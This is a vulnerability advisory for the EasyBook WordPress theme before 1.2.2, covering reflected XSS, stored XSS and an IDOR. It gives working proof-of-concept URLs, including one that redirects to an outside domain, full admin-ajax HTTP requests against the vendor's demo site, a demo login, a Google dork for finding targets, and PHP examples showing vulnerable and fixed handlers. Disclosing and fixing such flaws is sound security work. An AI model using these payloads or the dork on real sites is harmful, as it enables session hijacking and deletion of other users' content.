WPVDB-ID: F9AF72CF-2DEC-4980-9AC9-FC8704346394
Source: wpvulndb (wpscan.com)
Author: m0ze
Published: Jan 10, 2020 - 12:00 a.m.

EasyBook < 1.2.2 - Multiple Vulnerabilities


EPSS: 0.009 (Low), percentile 83.2%

Multiple vulnerabilities were discovered in the ‘EasyBook – Directory & Listing WordPress Theme’ (tested version: v1.2.1):

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- IDOR

Timeline:

- December 27th, 2019 - Envato contacted
- January 6th, 2020 - Envato investigating
- January ??th, 2020 - Theme removed from Envato
- January 8th, 2020 - v1.2.2 released
- January 10th, 2020 - Theme put back on Envato

PoC

-----[]- Info: -[]-----

Demo website: https://www.easybook.cththemes.org/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending
Google Dork: /wp-content/themes/easybook/
Date: 27/12/2019

-----[]- Reflected XSS: -[]-----

The input field with the placeholder «Hotel , City…» on the homepage is vulnerable. The same applies to the regular search (the block under the «Add Listing» button). The value of the search_term GET parameter is reflected into the page without escaping, so a request containing an HTML element is enough; no authentication is required.

Payload Sample #0:
Payload Sample #1:

PoC #0:
https://www.easybook.cththemes.org/?search_term=<img+src%3Dx+onerror%3Dalert(document.cookie)>&checkin=&checkout=&adults=1&children=0

PoC #1:
https://www.easybook.cththemes.org/?search_term=<img+src%3Dx+onerror%3Dwindow.location%3D`https%3A%2F%2Fm0ze.ru`%3B>&checkin=&checkout=&adults=1&children=0

-----[]- Persistent XSS -> Chat: -[]-----

Any cookie-stealing payload can be used to hijack a user's or administrator's session, or to force a redirect to a malicious website. The payload is sent from https://www.easybook.cththemes.org/dashboard/#/chats or from the chat widget in the bottom right corner, and executes when the receiver opens the conversation. Note that WordPress sets its authentication cookies with the HttpOnly flag by default, so document.cookie will not contain them; a script running in the victim's session can still act as that user directly (for example by issuing admin-ajax requests with the victim's nonce), so the impact is the same.

Payload Sample #0:
Payload Sample #1:

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: your_cookies_here

action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=payload

Where:
user_id=XXX (your unique WordPress user ID; note that the sender ID is taken from the request rather than from the session);
touid=1 (message receiver ID; in this example ID 1 is the «admin» account);
reply_text=payload (your payload).

-----[]- Persistent XSS -> Listing page: -[]-----

Add a new listing at https://www.easybook.cththemes.org/dashboard/#/addListing (the first time you need to order the «Free» plan and then open this URL again).
Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number».

Payload Sample #0: ">
Payload Sample #1: ">

Greetings from m0ze

Payload Sample #2: ">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------970149683563
Content-Length: 4142
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: your_cookies_here

-----------------------------970149683563
Content-Disposition: form-data; name="lid"

0
-----------------------------970149683563
Content-Disposition: form-data; name="listing_type_id"

5058
-----------------------------970149683563
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="locations"

US|M
-----------------------------970149683563
Content-Disposition: form-data; name="title"

PoC
-----------------------------970149683563
Content-Disposition: form-data; name="address"

">
-----------------------------970149683563
Content-Disposition: form-data; name="longitude"

">
-----------------------------970149683563
Content-Disposition: form-data; name="latitude"

">
-----------------------------970149683563
Content-Disposition: form-data; name="author_email"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_phone"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_website"

M
-----------------------------970149683563
Content-Disposition: form-data; name="content"

">
-----------------------------970149683563
Content-Disposition: form-data; name="features[0]"

303
-----------------------------970149683563
Content-Disposition: form-data; name="features[1]"

300
-----------------------------970149683563
Content-Disposition: form-data; name="features[2]"

305
-----------------------------970149683563
Content-Disposition: form-data; name="features[3]"

302
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][title]"

">
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][number]"

">
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][icon]"

123
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_id]"

-imgsrcxonerroralert12
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_name]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_desc]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_price]"

0
-----------------------------970149683563
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------970149683563
Content-Disposition: form-data; name="_wpnonce"

1c8cd14288
-----------------------------970149683563--
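How the two XSS sinks above should be handled in theme code, as an added example that is not EasyBook's own code (the theme's source is not on this page): the reflected search_term sink in its vulnerable form next to an escaped one, and a hardened chat reply handler with escaping at render time. The easybook_poc_ function names, the nonce action string and the option-based message storage are assumptions; the WordPress APIs used (esc_attr, esc_html, sanitize_text_field, wp_unslash, check_ajax_referer, wp_send_json_*) are real. The same rule, sanitize on input and escape for the exact output context, applies to the listing fields «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number».

```php
<?php
// Added example, not EasyBook code. Names prefixed easybook_poc_ are hypothetical.

// --- Reflected XSS: the search box -------------------------------------------
// Vulnerable pattern implied by the PoC URL: the raw GET parameter is printed
// into the input's value attribute, so
//   ?search_term=<img src=x onerror=alert(document.cookie)>
// closes the attribute and injects an element.
function easybook_poc_search_box_vulnerable() {
    $term = isset( $_GET['search_term'] ) ? $_GET['search_term'] : '';
    echo '<input type="text" name="search_term" value="' . $term . '" placeholder="Hotel , City...">';
}

// Fixed: unslash, reduce to plain text, then escape for the attribute context.
// esc_attr() encodes < > " ' &, so the value can never terminate the attribute.
function easybook_poc_search_box_fixed() {
    $term = isset( $_GET['search_term'] )
        ? sanitize_text_field( wp_unslash( $_GET['search_term'] ) )
        : '';
    echo '<input type="text" name="search_term" value="' . esc_attr( $term ) . '" placeholder="Hotel , City...">';
}

// --- Stored XSS: the chat reply ---------------------------------------------
// The PoC stores reply_text as submitted and the receiver's chat view renders it
// unescaped. Hardened handler: nonce + login check, sender taken from the
// session (the PoC shows user_id coming from the request body), strict input
// sanitisation, and escaping again when the message is rendered.
add_action( 'wp_ajax_easybook_addons_chat_reply', 'easybook_poc_chat_reply_fixed' );
function easybook_poc_chat_reply_fixed() {
    check_ajax_referer( 'easybook_chat', '_nonce' ); // nonce action name is an assumption
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'auth', 403 );
    }
    $from = get_current_user_id();                    // never trust user_id from the client
    $to   = absint( $_POST['touid'] ?? 0 );
    $cid  = absint( $_POST['cid'] ?? 0 );
    $text = sanitize_text_field( wp_unslash( $_POST['reply_text'] ?? '' ) ); // strips tags
    if ( ! $to || ! $cid || '' === $text ) {
        wp_send_json_error( 'bad_request', 400 );
    }
    easybook_poc_store_message( $cid, $from, $to, $text );
    wp_send_json_success();
}

// Illustrative storage (assumption): one array per conversation in wp_options.
// A real handler would also verify that $from is a participant of $cid.
function easybook_poc_store_message( $cid, $from, $to, $text ) {
    $log   = get_option( 'easybook_poc_chat_' . $cid, array() );
    $log[] = array( 'from' => $from, 'to' => $to, 'text' => $text, 'ts' => time() );
    update_option( 'easybook_poc_chat_' . $cid, $log, false );
}

// Render side: escape for the HTML text context regardless of what is stored,
// because sanitising on input alone fails as soon as another code path writes
// to the same store.
function easybook_poc_render_message( $text ) {
    return '<div class="chat-msg">' . esc_html( $text ) . '</div>';
}
```

Escaping is chosen by output context: esc_attr() inside an attribute, esc_html() in element text, esc_url() for href/src, and wp_json_encode() when a value is embedded in a script block. Sanitising on input (sanitize_text_field) narrows what is stored; it does not replace the escape at the sink.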
-----[]- IDOR: -[]-----

Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: your_cookies_here

action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX

Where:
lid=XXXX (the unique WordPress ID of the page/post/listing; it can be discovered from the page's class attribute, e.g. the postid-N / page-id-N class that WordPress's body_class() adds to the <body> tag).

The request carries a valid nonce for the attacker's own session (the same value, 1c8cd14288, appears in the chat and listing requests above), but a nonce is a CSRF token, not an authorization check: the handler never verifies that the current user is allowed to delete the object identified by lid, so any logged-in user can delete any post.
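What the missing authorization check looks like, as an added example rather than the theme's own code: the delete handler the PoC implies, next to one that asks WordPress whether the current user may delete that specific ID. The easybook_poc_ names, the nonce action string and the 'listing' post type are assumptions; the WordPress APIs (check_ajax_referer, get_post, current_user_can, wp_trash_post, wp_delete_post, wp_send_json_*) are real.

```php
<?php
// Added example, not EasyBook code. Names prefixed easybook_poc_ are hypothetical.

// Pattern implied by the PoC: a valid nonce plus a lid of the caller's choice
// deletes the post. The nonce proves the request came from this site's UI for
// this logged-in user; it says nothing about whether that user may delete lid.
function easybook_poc_delete_listing_vulnerable() {
    check_ajax_referer( 'easybook_listing', '_nonce' ); // nonce action name is an assumption
    $lid = absint( $_POST['lid'] );
    wp_delete_post( $lid, true );                        // no ownership / capability check
    wp_send_json_success();
}

// Fixed: resolve the object, constrain its type, and ask WordPress whether the
// current user holds delete_post on that specific ID. delete_post is a meta
// capability: map_meta_cap() turns it into delete_posts, delete_others_posts or
// delete_published_posts depending on who authored the post and its status.
add_action( 'wp_ajax_easybook_addons_delete_listing', 'easybook_poc_delete_listing_fixed' );
function easybook_poc_delete_listing_fixed() {
    check_ajax_referer( 'easybook_listing', '_nonce' );
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'auth', 403 );
    }
    $lid  = absint( $_POST['lid'] ?? 0 );
    $post = $lid ? get_post( $lid ) : null;
    // Restrict the endpoint to the object type it exists for; 'listing' is an
    // assumed post type name. This alone stops "delete any page/post".
    if ( ! $post || 'listing' !== $post->post_type ) {
        wp_send_json_error( 'not_found', 404 );
    }
    if ( ! current_user_can( 'delete_post', $post->ID ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_trash_post( $post->ID ); // soft delete; wp_delete_post( $id, true ) bypasses the trash
    wp_send_json_success( array( 'lid' => $post->ID ) );
}
```

Returning 404 for a wrong type and 403 for a wrong user is a choice, not a requirement; the important part is that the capability check is made against the concrete object ID rather than against a generic role, and that it happens after the nonce check rather than instead of it.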

Affected versions (CPE):

Name     | Operator | Version
easybook | lt (<)   | 1.2.2

